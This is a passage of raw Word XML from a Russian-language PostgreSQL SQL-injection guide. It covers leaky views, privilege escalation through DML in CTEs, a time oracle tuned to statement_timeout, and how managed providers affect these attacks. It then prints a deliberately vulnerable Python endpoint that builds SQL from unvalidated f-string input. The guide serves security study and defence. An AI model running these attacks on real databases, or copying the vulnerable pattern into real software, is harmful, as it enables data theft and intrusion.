        <w:t xml:space="preserve"> — 3.10.1 UPDATE role='admin' — privilege escalation на application-уровне; 3.13 — на PG-уровне. 3.10.3 Payload C требует SUPERUSER (получить через 3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC4BF21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leaky-функция из 3.10.3 — обычно plpgsql, в её prosrc может быть identifier-injection-вектор по тем же правилам 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E50386" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.2 (RLS bypass через MERGE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересечение с 3.10.1: MERGE в CTE — двойная цепочка bypass-а (extended-protocol + RLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C4D770" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 (Validation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практический ответ на 3.10: read-only роль для read-эндпоинтов, AST-based SQL-validation для блока DML-в-CTE, security_barrier=on на ACL-view, statement_timeout для защиты от 3.10.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89C087" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABB08B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.10 — категория про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>core SQL semantics</w:t>
      </w:r>
      <w:r>
        <w:t>: CTE, recursive, materialization, security_barrier, LEAKPROOF, COST. Все эти механизмы — часть PostgreSQL core; managed-провайдеры их не модифицируют и не отключают. Что специфично:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0927F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 DML в CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — работает идентично self-hosted. Provider не вмешивается; ограничение только на привилегиях application-роли (RDS / Cloud SQL / Supabase предоставляют separate read-only roles для opt-in защиты).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920EF5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.2 Recursive CTE / generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лимит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>work_mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно повышен на managed (для performance), что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>расширяет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возможности time-oracle. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дефолт у провайдеров: RDS — нет дефолта (DBA устанавливает); Cloud SQL — нет; Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>30s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для anon-роли. Атакующий калибрует N под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если он 30s, payload N=5M (3-4s) проходит надёжно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B01AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.3 Leaky views</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устанавливается на view через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER VIEW ... SET (security_barrier = true)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Managed-провайдеры предоставляют этот ALTER без ограничений. На provider-managed views (если provider предоставляет встроенные view, например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqladmin.*</w:t>
      </w:r>
      <w:r>
        <w:t>) — security_barrier обычно установлен правильно. Custom user-views — на ответственности DBA приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CC033E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`LEAKPROOF` функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — требуют SUPERUSER. На managed-PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>никакая роль не получает SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Это значит, что Payload C (3.10.3) на managed-провайдере </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>структурно невозможен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий не может создать LEAKPROOF-функцию, даже если контролирует application-роль полностью. Это значимая защита managed-окружения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5409B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Итоговая картина для managed: 3.10.1 и 3.10.2 работают идентично self-hosted. 3.10.3 в варианте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>direct leak (Payload A) и NOT MATERIALIZED-обход (Payload B)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работают так же; только LEAKPROOF-обход (Payload C) недоступен без SUPERUSER, что косвенно защищает managed от 3.10.3 при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. На views с дефолтным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (большинство user-views) Payload A работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC6767" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Детально по провайдерам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для самостоятельной разведки statement_timeout / security_barrier на текущем кластере — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHOW statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT relname, reloptions FROM pg_class WHERE relkind='v'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (доступно PUBLIC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607C63D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.11.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534CFAAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.11 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>специфику системы типов PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как поверхности атаки. В отличие от 3.1 (UNION) и 3.6 (OOB), где payload эксплуатирует синтаксическую структуру запроса, здесь payload работает через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>семантику типов</w:t>
      </w:r>
      <w:r>
        <w:t>: implicit coercion, type-specific операторы, парсинг строк в специализированные типы (boolean, jsonb, xml), driver-уровневое маршалирование scalar↔array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B39F453" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>PostgreSQL имеет одну из самых сложных систем типов среди реляционных СУБД (см. 2.4 — типы и cast-правила). Это создаёт несколько классов уязвимостей, которые не сводимы к стандартным паттернам:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EEB73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implicit text→boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволяет инжектировать в bool-контексты без необходимости в кавычках (3.11.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B3F58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jsonb-операторы `-&gt;` / `-&gt;&gt;` / `@@`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируют user-controlled строки как JSONPath/JSON keys, открывая отдельный язык DSL для injection (3.11.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2839DF06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`xpath()` и XML-функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсят user-input как XPath 1.0 — полноценный query-language с собственными функциями утечки (3.11.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DAAAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`= ANY($1)` vs `IN (...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеют разную семантику для драйверного маршалирования; некоторые драйверы передают scalar там, где код ожидал array, что создаёт type-confusion (3.11.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F93285" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413EE55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Уязвимый код для всех 3.11.x работает по схожему паттерну: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>тип параметра в коде Python/JS/Java не совпадает с типом колонки в БД, и приложение не валидирует значение перед бросанием в SQL</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB20CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/users.py — общий уязвимый паттерн</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F161DDC"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2E843C31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205F147"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9060396" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C486AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F9E59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A8DB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB1646" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/by-flag")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5233D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def by_flag(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C036B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    is_active: str,  # типизирован как str, но колонка — BOOLEAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263BF5D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    role_path: str,  # пойдёт в jsonb-&gt;&gt;{path}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65521383" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    metadata_xpath: str,  # пойдёт в xpath()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C37876" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ids: str,  # comma-separated; пойдёт в string_to_array()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1019D"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41D7A719" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0932335E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.1 — boolean coercion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E942FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q1 = text(f"SELECT * FROM users WHERE is_active = '{is_active}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BBB356" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.2 — jsonb path injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDBB265" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q2 = text(f"SELECT data-&gt;&gt;'{role_path}' FROM user_profiles WHERE id=1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657C9D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.3 — xpath injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E66450" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q3 = text(f"SELECT xpath('{metadata_xpath}', metadata) FROM users WHERE id=1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A347E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.4 — ANY array via string_to_array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A1F8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q4 = text(f"SELECT * FROM users WHERE id = ANY(string_to_array('{ids}', ',')::int[])")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68DAEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
